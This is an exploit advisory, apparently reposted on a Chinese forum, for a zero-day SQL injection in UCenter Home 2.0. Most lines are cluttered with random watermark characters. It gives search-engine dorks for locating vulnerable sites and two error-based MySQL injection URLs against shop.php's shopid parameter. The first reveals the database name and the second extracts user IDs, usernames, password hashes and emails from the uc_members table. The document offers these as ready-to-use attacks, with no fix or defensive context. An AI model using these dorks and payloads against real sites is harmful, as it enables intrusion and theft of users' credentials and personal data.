- j; c! ?# N5 @, n& G u% A
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
0 r1 y7 \2 ?! {8 j: a ^6 p* _; ~; a7 P9 y$ m4 r; o& D9 @2 o
4 ?, T8 _" z# H- ^+ n; P6 X* m: w/ F0 D8 b/ K; B# o1 h! e
*/ Author : KnocKout
' ?2 D0 {% t! G" j8 V4 t9 P) Y: ` G7 K- K/ [# t( J" w
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
2 E- |/ \1 x' U j
c' \. s/ ?" B3 }- n*/ Contact: knockoutr@msn.com
' M3 k; }' B8 L& t! g3 Q8 i+ a* p3 o3 s6 V5 X! A: A) a2 d8 }
*/ Cyber-Warrior.org/CWKnocKout
1 W, H2 j* ]# z% t. v, y0 y& f2 \: `4 g$ C
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== " g- {5 M; M; v
' j6 s0 R7 V* l
Script : UCenter Home
# K8 f4 t$ p( b
5 z! y( c7 f" V2 M& m7 o; PVersion : 2.0 3 \) p6 _# U4 |- m2 T2 o$ q6 Q( T
$ z. K2 a4 E) T1 ]
Script HomePage : http://u.discuz.net/ 3 b7 V I) }# f! ?
* Z9 E. P8 Z D2 _2 c__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 ]4 d6 x, `# p8 |2 U( ?! w
: z$ o8 N$ O& T+ o! L: |$ @Dork : Powered by UCenter inurl:shop.php?ac=view
8 k% Z$ y7 s5 @7 v# Y U) o+ j4 N& |3 y, Q1 E
Dork 2 : inurl:shop.php?ac=view&shopid= * i/ Z/ s3 i& J. w
4 C) O. ]2 ~3 U' g. `8 [! q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + U1 j: s0 P4 X/ o: R
7 h Y0 W$ O" W0 k
Vuln file : Shop.php * w* @+ C m3 Q( f* i; F' t7 D
1 ]1 M- ^ ~8 t d6 g2 e' K
value's : (?)ac=view&shopid=
* L8 O+ C7 m9 q* {1 g! L2 @( q2 e6 A/ x x! w* G
Vulnerable Style : SQL Injection (MySQL Error Based)
# D- l: e- j2 ?# r3 Y' | \
9 t3 D3 F+ E; f! H% D* ^Need Metarials : Hex Conversion ; g5 y8 \: ^0 f$ F
* c8 [# {0 `! w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ f* T$ a- x$ @/ x; w1 J: F0 B; t; G* K& Z, N
Your Need victim Database name.
1 q5 |7 ]. L/ n o) ^
- K) }& y2 p4 H5 J+ `( vfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 / \& W: p; d; R
! Y+ s |5 ^8 ]" ~.. % g. e6 z' l: R; i, F$ V, j
2 u: T; c7 B# v1 @1 z: {' \
DB : Okey.
6 M$ u3 ]& a1 H
9 e1 P: }) p, `. f2 `your edit DB `[TARGET DB NAME]`
& |6 H9 `5 C/ V4 _% x1 }
9 [. o/ q: D; ]$ Z' |Example : 'hiwir1_ucenter'
X0 ]7 o7 p C& K. f- `: f
/ [9 U3 P0 E4 B3 R( L9 [+ _/ I) Y; nEdit : Okey.
" S& l' `, z, M& t+ o) y7 Z4 c" i0 _' r
Your use Hex conversion. And edit Your SQL Injection Exploit.. ( h- L3 D/ W2 J3 v7 H) I- p
: C* q' J- i3 S" I! ~$ a9 t& {
0 ^ z0 e B, W% @# J% d! b* h0 C* s6 \; m) \6 i6 L
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 W% P" O' h" ?
|
发表于 2013-2-27 21:31:31
收藏
支持
反对